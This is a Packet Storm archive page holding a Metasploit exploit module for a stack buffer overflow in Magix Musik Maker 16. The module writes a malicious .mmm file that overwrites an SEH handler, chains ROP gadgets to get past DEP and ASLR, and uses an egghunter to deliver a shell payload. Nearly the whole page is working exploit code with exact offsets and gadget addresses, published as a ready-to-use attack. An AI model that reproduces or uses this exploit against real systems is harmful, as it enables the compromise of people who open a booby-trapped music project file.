what you don't know can hurt you

Magix Musik Maker 16 .mmm Stack Buffer Overflow

Magix Musik Maker 16 .mmm Stack Buffer Overflow
Posted May 23, 2011
Authored by corelanc0d3r, Acidgen | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in Magix Musik Maker 16. When opening a specially crafted arrangement file (.mmm) in the application, an unsafe strcpy() will allow you to overwrite a SEH handler. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and might require up to several seconds to receive a shell.

tags | exploit, overflow, shell
systems | windows, 7
advisories | OSVDB-72455
MD5 | 570e91a977ec5caabe84bd083c0b5756

Magix Musik Maker 16 .mmm Stack Buffer Overflow

Change Mirror Download
##
# $Id: magix_musikmaker_16_mmm.rb 12688 2011-05-22 23:41:15Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Egghunter

def initialize(info = {})
super(update_info(info,
'Name' => 'Magix Musik Maker 16 .mmm Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Magix Musik Maker 16.
When opening a specially crafted arrangement file (.mmm) in the application, an
unsafe strcpy() will allow you to overwrite a SEH handler. This exploit
bypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and
might require up to several seconds to receive a shell.
},
'License' => MSF_LICENSE,
'Author' =>
[
'acidgen', #found the vulnerability
'corelanc0d3r' #rop exploit + msf module
],
'Version' => '$Revision: 12688 $',
'References' =>
[
[ 'OSVDB', '72455'],
[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-002' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 8000, #could be more, but this is enough
'DisableNops' => 'True',
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows Universal DEP & ASLR Bypass',
{
'OffSet' => 198,
'Ret' => 0x200146fa, #add esp,40c/ret [ltkrn14n.dll]
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Apr 26 2011',
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'mmm file', 'msf.mmm']),
], self.class)
end

def junk
return rand_text(4).unpack("L")[0].to_i
end

def exploit

print_status("Creating '#{datastore['FILENAME']}' file ...")

badchars = ""
eggoptions =
{
:checksum => false,
:eggtag => "Wo0t",
:depmethod => "copy",
:depreg => "edi",
:depdest => "ebp"
}
hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)

header = "RIFF"
header << "\x8c"
header << "A"
header << "\x07\x00"
header << "SEKDSVIP"
header << "\x10\x07\x00\x00\x9b"
header << "[n"
header << "\x00" * 5
header << "\x11"
header << "\x00" * 3
header << "\x08"
header << "\x00" * 3
header << "D"
header << "\xac\x00\x00\x11"
header << "\x00" * 9
header << "9@"
header << "\x00\x00\xf0"
header << "B"
header << "\x00" * 4
header << "\xbd\x04\xef\xfe\x00\x00\x01"
header << "\x00" * 3
header << "\x10\x00\x04\x00\x02"
header << "\x00" * 3
header << "\x10\x00\x04\x00\x02\x00"
header << "?"
header << "\x00" * 3
header << "("
header << "\x00" * 3
header << "\x04\x00\x04\x00\x01"
header << "\x00" * 15
header << "K"
header << "\x91"
header << "2"
header << "\x01\xd0\x02\x00\x00"
header << "@"
header << "\x02\x00\x00"
header << "UUUUUU"
header << "\xf5"
header << "?"
header << "\x10"
header << "\x00" * 7
header << "\xff" * 8
header << "\x00" * 1680
header << "LISTx"
header << "\x95\x02\x00"
header << "physfile"
header << "\xf8\x08\x00\x00"
header << "C:\\Documents and Settings\\"
header << rand_text(8)
header << "\\My Documents\\MAGIX_Music_Maker_16\\AudioTemp"
header << "\x00" * 52
header << "Fat Rocker I_ogg.HDP"
header << "\x00" * 110
header << "C:\\Documents and Settings\\All Users\\Application Data\\MAGIX\\Music_Maker_16\\_Demos\\Demo"
header << "\x00" * 175
header << "Fat Rocker I.OGG"
header << "\x00" * 678
header << "\xf0\xbf"
header << "\x00" * 22
header << "\xf0"
header << "?"
header << "\x00" * 6
header << "^@"
header << "\x00" * 6
header << "^@"
header << "\x00" * 264

filename = "C:\\temp\\"
filename << "\xb3\x10\xf8\x1f" * 14 # slide
filename << "\x1e\x92\x01\x20" # align

rop_chain1 =
[
#API pointer
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
0x1ff810b3, # rop nop
0x1ff810b3, # rop nop
0x1ff810b3, # rop nop
0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll]
0x2005012c, # &API ptr
0x200263e4, # MOV EAX,DWORD PTR DS:[ECX] # RETN ** [LTKRN14N.dll]
0x1ffa3ab3, # MOV DWORD PTR DS:[EBX],EAX # MOV EAX,1 # POP EBX # RETN 0C ** [LTDIS14n.dll]
junk,
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
junk,
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA63D,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x20047f30, # POP ECX # RETN ** [LTKRN14N.dll]
0x2001283a, # POP ESI # POP EBP # POP EBX # ADD ESP,1F4 # RETN 10 ** [LTKRN14N.dll]
# write
0x1ff9cf5a, # MOV DWORD PTR DS:[EAX],ECX # MOV EAX,1 # POP ESI # RETN 08 ** [LTDIS14n.dll]
junk,
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA5F9,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
junk,
junk,
0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll]
junk,
].pack("V*")


rop_chain2 = [
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA591,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll] D16059A3
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 #
junk,
junk,
0x1ffa82ef, # POP EAX # RETN ** [LTDIS14n.dll]
junk,
junk,
junk,
junk,
0x2E9FB65D,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA539,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN **D16059A3 [LTKRN14N.dll]
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10
junk,
junk,
0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
junk,
junk,
junk,
0x2004e494, # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
junk,
0x1ffa0231, # DEC EAX # RETN ** [LTDIS14n.dll]
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA4D9,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN D16059A3
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x2003e6cd, # MOV DWORD PTR DS:[EAX],EDI # POP EDI # POP ESI # MOV EAX,1 # RETN 10 ** [LTKRN14N.dll]
junk,
junk,
0x2004e493, # PUSH ESP # ADD EAX,20 # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
junk,
junk,
0x20035546, # MOV EAX,EBX # POP EBP # POP EBX # RETN ** [LTKRN14N.dll]
junk,
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2E9FA469,
0x2004cb15, # ADD EAX,74085539 # ADD EAX,5D58046A # RETN ** [LTKRN14N.dll]
0x1ff93af7, # ADD EAX,ESI # POP ESI # RETN ** [LTDIS14n.dll]
junk,
0x1ff72ce1, # XCHG EAX,ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV EAX,1 # RETN
junk,
].pack("V*")

rop_chain3 = [
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08
junk,
junk,
junk,
junk,
0x1ffa82ef, # POP EAX # RETN
junk,
junk,
0x2004FF98,
0x1ffaccf6, # ADD EAX,100 # POP EBP # RETN
junk,
0x20026406, # MOV EAX,DWORD PTR DS:[EAX] # NEG EAX # RETN ** [LTKRN14N.dll]
0x20026408, # NEG EAX # RETN ** [LTKRN14N.dll]
0x1ff7c4e5, # XCHG EAX,EDI # RETN ** [LTDIS14n.dll]
0x2004da79, # XOR EAX,EAX # RETN ** [LTKRN14N.dll]
0x1ff93ae1, # ADD EAX,ESI # POP ESI # RETN
junk,
0x1ff95f45, # PUSH EAX # POP ESI # RETN 08 ** [LTDIS14n.dll]
0x1fffeb75, # XCHG EAX,EBP # RETN ** [LTKRN14N.dll]
junk,
junk,
#Oh Irony !
0x6001ac84, # PUSHAD # RETN ** [ijl10.dll]
].pack("V*")

rop_chain1_filler = rand_text(target['OffSet'] - rop_chain1.length - 2 )

# find a close heap
prehunter = "\x33\xC0" #xor eax,eax
prehunter << "\x64\x8B\x40\x30" #mov eax,fs[:30]
prehunter << "\x83\xC0\x48" #add eax,48
prehunter << "\x83\xC0\x48" #add eax,48
prehunter << "\x8B\x10" #mov edx,[eax]
prehunter << "\x83\xc2\x4c" #add edx,4c
prehunter << "\x83\xc2\x4c" #add edx,4c
prehunter << "\x8B\x12" #mov edx,[edx]

nops = make_nops(100)

filler = "\x5D\xC6\x9F\x2E" # offset to 0x2000
filler << "\xc2\x53\x02\x20" # RETN
filler << "\x04\x80\xfa\x1f" # jump - first run : 0x1ffa8004 : {pivot 8} # POP EDI # POP EBP # RETN ** [LTDIS14n.dll]
filler << "\x12\x3a\xff\x1f" # p/p/p/p/add esp,90/ret [ltkrn14n.dll] - second run
filler << "\xff\xff\xff\xff" # access violation

buffer = header
buffer << filename
buffer << rop_chain1
buffer << rop_chain1_filler
buffer << [target.ret].pack("V")
buffer << filler
buffer << rop_chain2
buffer << rop_chain3
buffer << prehunter
buffer << hunter
buffer << nops
buffer << egg

filecontent = header + buffer

print_status("Writing payload to file")

file_create(filecontent)

end

end
Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    4 Files
  • 13
    Apr 13th
    15 Files
  • 14
    Apr 14th
    27 Files
  • 15
    Apr 15th
    19 Files
  • 16
    Apr 16th
    7 Files
  • 17
    Apr 17th
    1 Files
  • 18
    Apr 18th
    1 Files
  • 19
    Apr 19th
    19 Files
  • 20
    Apr 20th
    18 Files
  • 21
    Apr 21st
    30 Files
  • 22
    Apr 22nd
    18 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close